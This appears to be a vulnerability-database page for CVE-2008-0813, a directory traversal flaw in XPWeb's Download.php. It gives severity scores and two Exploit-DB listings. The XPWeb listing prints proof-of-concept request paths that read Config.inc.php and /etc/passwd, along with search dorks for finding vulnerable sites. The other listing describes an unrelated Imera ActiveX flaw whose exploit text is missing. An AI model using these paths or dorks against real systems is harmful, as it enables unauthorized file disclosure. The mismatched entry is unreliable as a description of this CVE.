CVE-2008-0813
published 2008-02-19CVE-2008-0813: Directory traversal vulnerability in Download.php in XPWeb 3.0.1, 3.3.2, and possibly other versions, allows remote attackers to read arbitrary files via a .…
PriorityP429medium5CVSS 2.0
AVNACLAuNCPINAN
EXPLOIT
EPSS
2.67%
83.9th percentile
Directory traversal vulnerability in Download.php in XPWeb 3.0.1, 3.3.2, and possibly other versions, allows remote attackers to read arbitrary files via a .. (dot dot) in the url parameter.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| xpweb | xpweb | — | — |
| xpweb | xpweb | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Imera ImeraIEPlugin - ActiveX Control Remote Code Execution
exploitdb·2009-03-03
CVE-2009-0813 Imera ImeraIEPlugin - ActiveX Control Remote Code Execution
Imera ImeraIEPlugin - ActiveX Control Remote Code Execution
---
Who:
Imera(http://www.imera.com)
Imera TeamLinks Client(http://teamlinks.imera.com/install.html)
What:
ImeraIEPlugin.dll
Version 1.0.2.54
Dated 12/02/2008
{75CC8584-86D4-4A50-B976-AA72618322C6}
http://teamlinks.imera.com/ImeraIEPlugin.cab
How:
This control is used to install the Imera TeamLinks Client
package. The control fails to validate the content that it is to
download and install is indeed the Imera TeamLinks Client software.
Exploiting this issue is quite simple, like so:
Fix:
The vendor has been notified.
Workaround:
Set the killbit for the affected control, see
http://support.microsoft.com/kb/240797.
Use the Java installer for TeamLinks Client or install the software
manually from: http://teamlinks.imera
Exploit-DB
XPWeb 3.3.2 - 'url' Remote File Disclosure
exploitdb·2008-02-17
CVE-2008-0813 XPWeb 3.3.2 - 'url' Remote File Disclosure
XPWeb 3.3.2 - 'url' Remote File Disclosure
---
### XPWeb 3.3.2 (Download.php url) Remote File Disclosure Vulnerability
### http://puzzle.dl.sourceforge.net/sourceforge/xpweb/XPWeb_v3.3.2.tgz
### POC :
### /XPWeb_v3.3.2/Download.php?url=Config.inc.php
### /XPWeb_v3.3.2/Download.php?url=../../../../../../../etc/passwd
### Dorks : intitle:XPWeb 3.3.2
### intitle:XPWeb 3.0.1
### I'm tryagi .. TRYAG.Cc/cc
# milw0rm.com [2008-02-17]
No writeups or analysis indexed.
http://secunia.com/advisories/29006http://www.securityfocus.com/bid/27838http://www.vupen.com/english/advisories/2008/0584https://www.exploit-db.com/exploits/5137http://secunia.com/advisories/29006http://www.securityfocus.com/bid/27838http://www.vupen.com/english/advisories/2008/0584https://www.exploit-db.com/exploits/5137
2008-02-19
Published